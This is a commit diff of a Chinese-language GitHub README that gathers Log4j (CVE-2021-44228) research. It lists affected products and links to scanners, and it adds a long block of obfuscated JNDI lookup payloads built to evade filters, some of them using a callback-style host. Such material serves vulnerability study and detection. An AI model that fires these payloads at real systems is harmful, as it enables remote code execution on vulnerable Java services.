22
33** Log4j影响实在太大了,本人开始写专项漏洞检测工具-永恒之恶龙。Star超过200[ 发布] ( https://github.com/Goqi/ELong ) !欢迎关注,感谢小星星!**
44
5- 本项目用来致敬全宇宙最无敌的Java日志库!同时也记录自己在学习Log4j漏洞过程中遇到的一些内容。本项目会持续更新,本项目创建于2021年12月10日,最近的一次更新时间为2021年12月26日 。作者:[ 0e0w] ( https://github.com/0e0w/HackLog4j )
5+ 本项目用来致敬全宇宙最无敌的Java日志库!同时也记录自己在学习Log4j漏洞过程中遇到的一些内容。本项目会持续更新,本项目创建于2021年12月10日,最近的一次更新时间为2021年12月28日 。作者:[ 0e0w] ( https://github.com/0e0w/HackLog4j )
66
77- [ 00-Log4j永恒恶龙] ( https://github.com/0e0w/HackLog4j#00-log4j%E6%B0%B8%E6%81%92%E6%81%B6%E9%BE%99 )
88- [ 01-Log4j基础知识] ( https://github.com/0e0w/HackLog4j#01-log4j%E5%9F%BA%E7%A1%80%E7%9F%A5%E8%AF%86 )
3030
3131** log4j + ? = rce !**
3232
33- - [] Apache Flink
34- - [] Apache Struts2
33+ - [x ] Apache Flink
34+ - [x ] Apache Struts2
3535- [ ] Apache Spark
36+ - [x] Apache Storm
3637- [ ] Apache Tomcat
3738- [x] Apache Solr
3839- [ ] Apache Dubbo
3940- [ ] Apache Druid
40- - [] Apache OFBiz
41- - [ ] flume
41+ - [x ] Apache OFBiz
42+ - [ ] Apache Flume
4243- [ ] Redis
43- - [ ] logstash
44+ - [ ] Logstash
4445- [ ] ElasticSearch
45- - [ ] kafka
46- - [ ] ghidra
46+ - [ ] Apache Kafka
47+ - [ ] Ghidra
4748- [ ] Spring-Boot-strater-log4j2
4849- [ ] VMware vCenter
4950- [ ] Minecraft
50- - [ ] Logstash
5151- ......
5252- https://fofa.so/static_pages/log4j2
5353- https://github.com/cisagov/log4j-affected-db
7272一、Payload
7373
7474```
75- ${jndi:rmi://127.0.0.1/poc}
7675${jndi:ldap://127.0.0.1/poc}
76+ ${jndi:rmi://127.0.0.1/poc}
7777${jndi:dns://127.0.0.1/poc}
7878${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://127.0.0.1/poc}
7979${${::-j}ndi:rmi://127.0.0.1/poc}
@@ -111,9 +111,25 @@ ${jvmrunargs:ldap://127.0.0.1/poc}
111111${sys:ldap://127.0.0.1/poc}
112112${env:ldap://127.0.0.1/poc}
113113${log4j:ldap://127.0.0.1/poc}
114+ ${j${k8s:k5:-ND}i${sd:k5:-:}${lower:l}d${lower:a}${lower:p}://${hostName}.{{interactsh-url}}}
115+ ${jndi:rmi://127.0.0.1}/
116+ ${jnd${123%25ff:-${123%25ff:-i:}}ldap://127.0.0.1/poc}
117+ ${jndi:dns://127.0.0.1}
118+ ${j${k8s:k5:-ND}i:ldap://127.0.0.1/poc}
119+ ${j${k8s:k5:-ND}i:ldap${sd:k5:-:}//127.0.0.1/poc}
120+ ${j${k8s:k5:-ND}i${sd:k5:-:}ldap://127.0.0.1/poc}
121+ ${j${k8s:k5:-ND}i${sd:k5:-:}ldap${sd:k5:-:}//127.0.0.1/poc}
122+ ${${k8s:k5:-J}${k8s:k5:-ND}i${sd:k5:-:}ldap://127.0.0.1/poc}
123+ ${${k8s:k5:-J}${k8s:k5:-ND}i${sd:k5:-:}ldap{sd:k5:-:}//127.0.0.1/poc}
124+ ${${k8s:k5:-J}${k8s:k5:-ND}i${sd:k5:-:}l${lower:D}ap${sd:k5:-:}//127.0.0.1/poc}
125+ ${j${k8s:k5:-ND}i${sd:k5:-:}${lower:L}dap${sd:k5:-:}//127.0.0.1/poc
126+ ${${k8s:k5:-J}${k8s:k5:-ND}i${sd:k5:-:}l${lower:D}a${::-p}${sd:k5:-:}//127.0.0.1/poc}
127+ ${jndi:${lower:l}${lower:d}a${lower:p}://127.0.0.1}
128+ ${jnd${upper:i}:ldap://127.0.0.1/poc}
129+ ${j${${:-l}${:-o}${:-w}${:-e}${:-r}:n}di:ldap://127.0.0.1/poc}
130+ ${jndi:ldap://127.0.0.1#127.0.0.1:1389/poc}
114131```
115132
116- - https://github.com/fullhunt/log4j-scan
117133- https://github.com/test502git/log4j-fuzz-head-poc
118134- https://github.com/woodpecker-appstore/log4j-payload-generator
119135- https://github.com/Puliczek/CVE-2021-44228-PoC-log4j-bypass-words
@@ -131,6 +147,7 @@ ${log4j:ldap://127.0.0.1/poc}
131147- https://github.com/lijiejie/log4j2_vul_local_scanner
132148- https://github.com/palantir/log4j-sniffer
133149- https://github.com/mergebase/log4j-detector
150+ - https://www.t00ls.cc/thread-63931-1-1.html
134151
135152三、出网检测
136153
@@ -165,9 +182,11 @@ ${log4j:ldap://127.0.0.1/poc}
165182- https://github.com/gh0stkey/Log4j2-RCE-Scanner
166183- https://github.com/p1n93r/Log4j2Scan
167184
168- 七、Host头检测
185+ 七、Header检测
169186
187+ - https://github.com/fullhunt/log4j-scan
170188- https://github.com/0xInfection/LogMePwn
189+ - https://github.com/TaroballzChen/CVE-2021-44228-log4jVulnScanner-metasploit
171190
172191八、请求参数检测
173192
0 commit comments